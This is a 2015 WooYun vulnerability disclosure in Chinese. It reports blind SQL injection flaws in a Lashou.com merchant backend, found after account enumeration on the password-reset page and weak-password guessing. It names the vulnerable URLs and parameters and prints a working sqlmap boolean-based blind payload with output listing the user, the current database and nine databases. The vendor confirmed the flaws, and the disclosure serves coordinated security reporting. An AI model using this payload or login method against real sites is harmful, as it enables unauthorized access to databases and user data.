漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0103461
漏洞标题:拉手网某网站SQL注入数枚
相关厂商:拉手网
漏洞作者: 403
提交时间:2015-03-24 16:25
修复时间:2015-05-08 17:46
公开时间:2015-05-08 17:46
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:10
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-03-24: 细节已通知厂商并且等待厂商处理中
2015-03-24: 厂商已经确认,细节仅向厂商公开
2015-04-03: 细节向核心白帽子及相关领域专家公开
2015-04-13: 细节向普通白帽子公开
2015-04-23: 细节向实习白帽子公开
2015-05-08: 细节向公众公开
简要描述:
存在多处盲注。
详细说明:
通过拉手网商家后台找回密码页面模糊测试获取账号,再通过账号弱口令测试得到账号密码5/5
http://cg.lashou.com/new_index.php?class=FindPasswd&old=0
然后登录检测获取盲注点数枚:
http://nsp.lashou.com/Home/Comment/index?end_time=2015-03-23&fd_id=&goods_id=1&is_reply=0&score=0&start_time=2015-03-23 (分店fd_id存在延时盲注)
http://nsp.lashou.com/Home/Commfeedback/submitfeedback?feedback=&mer_ask=1&telephone= (三个参数均存在布尔型盲注)
小试了下可脱裤。
漏洞证明:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
current user: 'StarCraft@10.168.%.%'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
current user is DBA: False
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
current database: 'nsp'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: telephone
Type: boolean-based blind
Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
Payload: feedback=&mer_ask=1&telephone=555-666-0606" RLIKE (SELECT (CASE WHEN (7628=7628) THEN 0x3535352d3636362d30363036 ELSE 0x28 END)) AND "YdfZ"="YdfZ
---
back-end DBMS: MySQL >= 5.0.0
available databases [9]:
[*] `session`
[*] community
[*] information_schema
[*] lashou_activity
[*] lashou_ht
[*] lashou_info
[*] mysql
[*] nsp
[*] test
修复方案:
过滤,另外商户后台禁止弱口令。
版权声明:转载请注明来源 403@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:18
确认时间:2015-03-24 17:45
厂商回复:
谢谢您的关注.漏洞已经告知研发.研发正在着手改正.万谢.
最新状态:
暂无